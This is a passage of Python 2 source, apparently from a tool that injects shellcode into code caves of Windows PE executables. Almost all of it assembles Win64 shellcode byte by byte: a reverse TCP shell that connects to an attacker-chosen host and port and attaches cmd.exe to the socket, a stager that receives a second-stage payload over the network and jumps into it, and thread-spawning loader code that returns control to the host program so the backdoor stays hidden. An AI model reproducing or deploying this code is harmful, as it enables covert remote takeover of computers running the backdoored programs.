"\x48\x89\xC1" # mov rdx, rax
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD4" # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0)
"\x49\x94" # xchg r12, rax ; mov socket to r12
# get connect
"\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00" # mov rdx, "connect\x00"
"\x52" # push rdx
"\x48\x89\xE2" # mov rdx, rsp
"\x4C\x89\xE9" # mov rcx, r13; ws2_32 handle
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] ;GetProcAddr connect
"\x48\x89\xC3" # mov rbx, rax ;connect api
"\x6A\x10" # push 16
"\x41\x58" # pop r8
"\x48\x89\xFA" # mov rdx, rdi
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD3" # call rbx ;connect (s, &sockaddr, 16)
)
#socket is in r12
self.shellcode2 += ("\xeb\x09" # jump over kernel32
"\x6b\x65\x72\x6e\x65\x6c\x33\x32\x00" # kernel32,00
"\x48\x8D\x0D\xF0\xFF\xFF\xFF" # lea rcx, [rip-4]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x16" # call qword ptr [r14]
# getprocaddress CreateProcessA
"\x49\x89\xC5" # mov r13, rax ; mov kernel32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0f" # jump over CreateProcessA,0
"\x43\x72\x65\x61\x74\x65\x50" # CreateProcessA
"\x72\x6f\x63\x65\x73\x73\x41\x00" # ...
"\x48\x8D\x15\xEA\xFF\xFF\xFF" # lea rdx, [rip - 22]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr CreateProcessA
# CreateProcessesA in rax
"\x48\x89\xC7" # mov rdi, rax ;mov CreateProcessA to rdi
"\x49\x87\xFC" # xchg r12, rdi (socket handle for CreateProcessA)
# socket is in rdi
# shell:
"\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00" # mov r8, 'cmd'
"\x41\x50" # push r8 ; an extra push for alignment
"\x41\x50" # push r8 ; push our command line: 'cmd',0
"\x48\x89\xe2" # mov rdx, rsp ; save a pointer to the command line
"\x57" # push rdi ; our socket becomes the shells hStdError
"\x57" # push rdi ; our socket becomes the shells hStdOutput
"\x57" # push rdi ; our socket becomes the shells hStdInput
"\x4d\x31\xc0" # xor r8, r8 ; Clear r8 for all the NULL's we need to push
"\x6a\x0d" # push byte 13 ; We want to place 104 (13 * 8) null bytes onto the stack
"\x59" # pop rcx ; Set RCX for the loop
# 1 push_loop: ;
"\x41\x50" # push r8 ; push a null qword
"\xe2\xfc" # loop push_loop ; keep looping untill we have pushed enough nulls
"\x66\xc7\x44\x24\x54\x01\x01" # mov word [rsp+84], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
"\x48\x8d\x44\x24\x18" # lea rax, [rsp+24] ; Set RAX as a pointer to our STARTUPINFO Structure
"\xc6\x00\x68" # mov byte [rax], 104 ; Set the size of the STARTUPINFO Structure
"\x48\x89\xe6" # mov rsi, rsp ; Save the pointer to the PROCESS_INFORMATION Structure
# ; 1 perform the call to CreateProcessA
"\x56" # push rsi ; Push the pointer to the PROCESS_INFORMATION Structure
"\x50" # push rax ; Push the pointer to the STARTUPINFO Structure
"\x41\x50" # push r8 ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
"\x41\x50" # push r8 ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
"\x41\x50" # push r8 ; We dont specify any dwCreationFlags
"\x49\xff\xc0" # inc r8 ; Increment r8 to be one
"\x41\x50" # push r8 ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
"\x49\xff\xc8" # dec r8 ; Decrement r8 (third param) back down to zero
"\x4d\x89\xc1" # mov r9, r8 ; Set fourth param, lpThreadAttributes to NULL
# ; r8 = lpProcessAttributes (NULL)
# ; rdx = the lpCommandLine to point to "cmd",0
"\x4c\x89\xc1" # mov rcx, r8 ; Set lpApplicationName to NULL as we are using the command line param instead
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\xD4" # call r12 ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
# perform the call to WaitForSingleObject
"\xeb\x14" # jmp over WaitForSingleObject
"\x57\x61\x69\x74\x46\x6f\x72\x53" # WaitForSingleObject
"\x69\x6e\x67\x6c\x65\x4f\x62\x6a" # ...
"\x65\x63\x74\x00" # ...
"\x48\x8D\x15\xE5\xFF\xFF\xFF" # lea rdx, [rip-27]
"\x4C\x89\xE9" # mov rcx, r13 ; mov kernel32 handle to rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WaitForSingleObject
# WaitForSingleObject is in rax
"\x48\x31\xd2" # xor rdx, rdx
"\x48\xFF\xCA" # dec rdx
"\x8b\x0e" # mov ecx, dword [rsi] ; set the first param to the handle from our PROCESS_INFORMATION.hProcess
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD0" # call rax; WaitForSingleObject( pi.hProcess, INFINITE );
#Fix Up rsp
#"\x48\x81\xC4\x08\x04\x00\x00" # add rsp, 490
)
# ADD EXITFUNC HERE THREAD
#kernel32 handle in r13
#LoadLibraryA in r14
#GetProcAddress in r15
# just try exitthread...
self.shellcode2 += ("\xeb\x0b"
"\x47\x65\x74\x56\x65"
"\x72\x73\x69\x6f\x6e\x00" # GetVersion
"\x48\x8D\x15\xEE\xFF\xFF\xFF" # lea rdx, [rip-16]
"\x4C\x89\xE9" # mov rcx, r13 ; mov kernel32 handle to rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr GetVersion
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd0" # call rax (getversion)
"\x83\xf8\x06" # cmp al, 6
"\x7d\x19" # jl short to ntdll
"\xeb\x0b"
"\x45\x78\x69\x74\x54" # ...
"\x68\x72\x65\x61\x64\x00" # ExitThread
"\x48\x8D\x15\xEE\xFF\xFF\xFF" # lea rdx, [rip -16]
"\x4C\x89\xE9" # mov rcx, r13 ..add mov kernel32 to rcx
"\xeb\x34" # jmp short to su rsp for getprocaddress
"\xeb\x06" # jmp short over ntdll
"\x6e\x74\x64\x6c\x6c\x00" # ntdll
"\x48\x8D\x0D\xF3\xFF\xFF\xFF" # lea rcx, [rip -13]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] LoadlibA ntdll
"\x48\x89\xc1" # mov rcx, rax
"\xeb\x12" # jmp over RtlExitUserThread
"\x52\x74\x6c\x45\x78\x69\x74\x55\x73" # RtlExitUserThread
"\x65\x72\x54\x68\x72\x65\x61\x64\x00" # ...
"\x48\x8D\x15\xE7\xFF\xFF\xFF" # lea rdx, [rip -16]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr RtlExitUserThread or ExitThread
"\x48\x31\xc9" # xor rcx, rcx
"\xff\xd0" # call rax
)
#Virtual ALLOC Code BELOW
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\x90" # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" # jmp to allocate
#api_call
"\x41\x51" # push r9
"\x41\x50" # push r8
"\x52" # push rdx
"\x51" # push rcx
"\x56" # push rsi
"\x48\x31\xD2" # xor rdx,rdx
"\x65\x48\x8B\x52\x60" # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" # mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" # xor r9,r9
#loop_modname
"\x48\x31\xc0" # xor rax,rax
"\xac" # lods
"\x3c\x61" # cmp al, 61h (a)
"\x7c\x02" # jl 02
"\x2c\x20" # sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" # ror r9d, 13
"\x41\x01\xc1" # add r9d, eax
"\xe2\xed" # loop until read, back to xor rax, rax
"\x52" # push rdx ; Save the current position in the module list for later
"\x41\x51" # push r9 ; Save the current module hash for later
# ; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" # test rax, rax ; Test if no export address table is present
"\x74\x67" # je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x50" # push rax ; Save the current modules EAT
"\x8b\x48\x18" # mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" # mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" # xor rax, rax ; Clear rax
"\xac" # lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" # add r9d, eax ; Add the next byte of the name
"\x38\xe0" # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" # jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" # add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" # jnz get_next_func ; Go compute the next function hash if we have not found it
# ; If found, fix up stack, call the function and then value else compute the next one...
"\x58" # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" # mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address to get the functions actual VA
#; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" # pop r8 ; Clear off the current modules hash
"\x41\x58" # pop r8 ; Clear off the current position in the module list
"\x5E" # pop rsi ; Restore RSI
"\x59" # pop rcx ; Restore the 1st parameter
"\x5A" # pop rdx ; Restore the 2nd parameter
"\x41\x58" # pop r8 ; Restore the 3rd parameter
"\x41\x59" # pop r9 ; Restore the 4th parameter
"\x41\x5A" # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" # push r10 ; push back the return address
"\xFF\xE0" # jmp rax ; Jump into the required function
# ; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" # pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" # pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
)
#allocate
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc6" # mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xF2" # mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" # push E553a458
"\x41\x5A" # pop r10
"\xff\xd5" # call rbp
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
)
##mov rcx, 0x1ab
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def iat_reverse_tcp_stager_threaded(self, flItms, CavesPicked={}):
"""
Completed IAT based payload includes spawning of thread.
"""
flItms['stager'] = True
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress',
'VirtualAlloc', 'CreateThread']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 71).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xBA\xFF\xFF\xFF"
#Can inject any shellcode below.
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
self.shellcode2 += "\xfc" # CLD
self.shellcode2 += "\x55\x48\x89\xE5" # mov rbp, rsp
self.shellcode2 += "\x48\x31\xD2" # xor rdx, rdx
self.shellcode2 += "\x65\x48\x8B\x52\x60" # mov rdx, QWORD ptr gs: [rdx+0x60]
self.shellcode2 += "\x48\x8B\x52\x10" # mov rdx, Qword ptr [rdx + 10]
# rdx now module entry
self.shellcode2 += "\x49\xBE" # mov value below to r14
if flItms['LoadLibraryA'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['LoadLibraryA'] - flItms['ImageBase'])
#RDX holds entry point
self.shellcode2 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode2 += "\x49\xBF" # mov value below to r15
if flItms['GetProcAddress'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['GetProcAddress'] - flItms['ImageBase'])
self.shellcode2 += "\x49\x01\xD7" # add r15 + RDX
# LoadLibraryA in r14
# GetProcAddress in r15
self.shellcode2 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00" # mov r11, ws2_32
"\x41\x53" # push r11
"\x49\x89\xE3" # mov r11, rsp
"\x48\x81\xEC\xA0\x01\x00\x00" # sub rsp, 408+8 # size of WSAData
"\x48\x89\xE6" # mov rsi, rsp pointer to WSAData struct
"\x48\xBF\x02\x00"
)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x57" # push rdi
"\x48\x89\xE7" # mov rdi, rsp pointer to data
"\x4C\x89\xD9" # mov rcx, r11 #ws2_32
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] ; LoadLibA
"\x49\x89\xC5" # mov r13, rax ; handle ws2_32 to r13
# handle ws2_32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0c" # short jmp over api
"\x57\x53\x41\x53\x74\x61" # WSAStartup
"\x72\x74\x75\x70\x00\x00" # ...
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # Call qword ptr [r15] ; GetProcAddr
"\x48\x95" # xchg rbp, rax ; mov wsastartup to rbp
# wsastartup to rbp
"\xeb\x0c" # jmp over WSASocketA
"\x57\x53\x41\x53\x6f\x63" # WSASocketA
"\x6b\x65\x74\x41\x00\x00" #
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x4C\x89\xE9" # mov rcx, r13
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WSASocketA
"\x49\x94" # xchg r12, rax ; mov WSASocketA to r12
# WSASocketA to r12
"\x48\x89\xF2" # mov rdx, rsi ; mov point to struct
"\x68\x01\x01\x00\x00" # push 0x0101
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd5" # call rbp ; WSAStartup(0x0101, &WSAData);
"\x50" # push rax
"\x50" # push rax
"\x4D\x31\xC0" # xor r8, r8
"\x4D\x31\xC9" # xor r9, r9
"\x48\xff\xC0" # inc rax
"\x48\x89\xC2" # mov rdx, rax
"\x48\xff\xC0" # inc rax
"\x48\x89\xC1" # mov rdx, rax
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD4" # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0)
"\x49\x94" # xchg r12, rax ; mov socket to r12
# get connect
"\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00" # mov rdx, "connect\x00"
"\x52" # push rdx
"\x48\x89\xE2" # mov rdx, rsp
"\x4C\x89\xE9" # mov rcx, r13; ws2_32 handle
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] ;GetProcAddr connect
"\x48\x89\xC3" # mov rbx, rax ;connect api
"\x6A\x10" # push 16
"\x41\x58" # pop r8
"\x48\x89\xFA" # mov rdx, rdi
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD3" # call rbx ;connect (s, &sockaddr, 16)
)
# socket is in r12
# rdi has the struct for the socket
# r14: GetProcAddress
# r15: LoadLibraryA
# r13 has ws2_32 handle
# reminder: RCX, RDX, R8, R9 for the first four integer or pointer arguments
self.shellcode2 += ("\x90\x90\x90\x90"
#get recv handle
"\x4C\x89\xE9" # mov rcx, r13 ; ws2_32 handle in rcx
"\x48\xBA\x72\x65\x63\x76\x00\x00\x00\x00" # mov rdx, recv
"\x52" # push rdx
"\x48\x89\xe2" # mov rdx, rsp
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15]; getprocaddr recv
"\x49\x89\xC5" # mov r13, rax ; don't need ws2_32 handle
"\x48\x81\xC4\xD0\x02\x00\x00" # add rsp, 0x2F8
"\x48\x83\xec\x10" # sub rsp, 16
"\x48\x89\xe2" # mov rdx, rsp
"\x4D\x31\xC9" # xor r9, r9
"\x6a\x04" # push byte 0x4
"\x41\x58" # pop r8
"\x4C\x89\xE1" # mov rcx, r12; socket
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD5" # call r13; recv
"\x48\x83\xC4\x20" # add rsp, 32 ;need to restore the stack
"\x5e" # pop rsi ; size of second stage
)
self.shellcode2 += ("\x48\x31\xD2" # xor rdx, rdx
"\x65\x48\x8B\x52\x60" # mov rdx, QWORD ptr gs: [rdx+0x60]
"\x48\x8B\x52\x10" # mov rdx, QWORD ptr [rdx + 10]
)
# rdx now module entry
self.shellcode2 += "\x49\xBE" # mov value below to r14
if flItms['VirtualAlloc'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['VirtualAlloc'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['VirtualAlloc'] - flItms['ImageBase'])
self.shellcode2 += "\x49\x01\xD6" # add r14 + RDX
# r14 now holds VirtualAlloc
self.shellcode2 += ("\x6a\x40" # push byte 0x40
"\x41\x59" # pop r9
"\x68\x00\x10\x00\x00" # push 0x1000
"\x41\x58" # pop r8
"\x48\x89\xf2" # mov rdx, rsi
"\x48\x31\xc9" # xor rcx, rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call r14; call VirtualAlloc
"\x48\x89\xc3" # mov rbx, rax
"\x49\x89\xC7" # mov r15, rax
"\x4D\x31\xC9" # xor r9, r9
"\x49\x89\xF0" # mov r8, rsi
"\x48\x89\xDA" # mov rdx, rbx
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD5" # call r13; recv
"\x48\x01\xC3" # add rbx, rax
"\x48\x29\xC6" # sub rsi, rax
"\x48\x85\xF6" # test rsi, rsi
"\x75\xe2" # jnz short -X
"\x4C\x89\xE7" # mov rdi, r12 ; socket to rdi
"\x41\xFF\xE7" # jmp r15
)
breakupvar = eat_code_caves(flItms, 0, 1)
#allocate
self.shellcode1 = "\xfc"
self.shellcode1 += "\x49\xBE" # mov value below to r14
if flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
# RDX holds entry point
self.shellcode1 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode1 += "\x49\xBF" # mov value below to r15
if flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x49\x01\xD7" # add r15 + RDX
# r14 virtualalloc
# r15 createthread
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc5" # mov r13, size of payload...
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xEA" # mov rdx, r13
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x16" # call qword ptr [r14]
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in rbx
"\x48\x89\xc7" # mov rdi, rax ; Prepare RDI with the new address
)
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x41"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#^^^^ I could delete this need to fix jmp, call, and stack
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15]
"\x48\x83\xC4\x50" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def iat_user_supplied_shellcode_threaded(self, flItms, CavesPicked={}):
"""
Completed IAT based payload includes spawning of thread.
"""
flItms['stager'] = True
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress',
'VirtualAlloc', 'CreateThread']
for api in flItms['apis_needed']:
if api not in flItms:
return False
#overloading stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
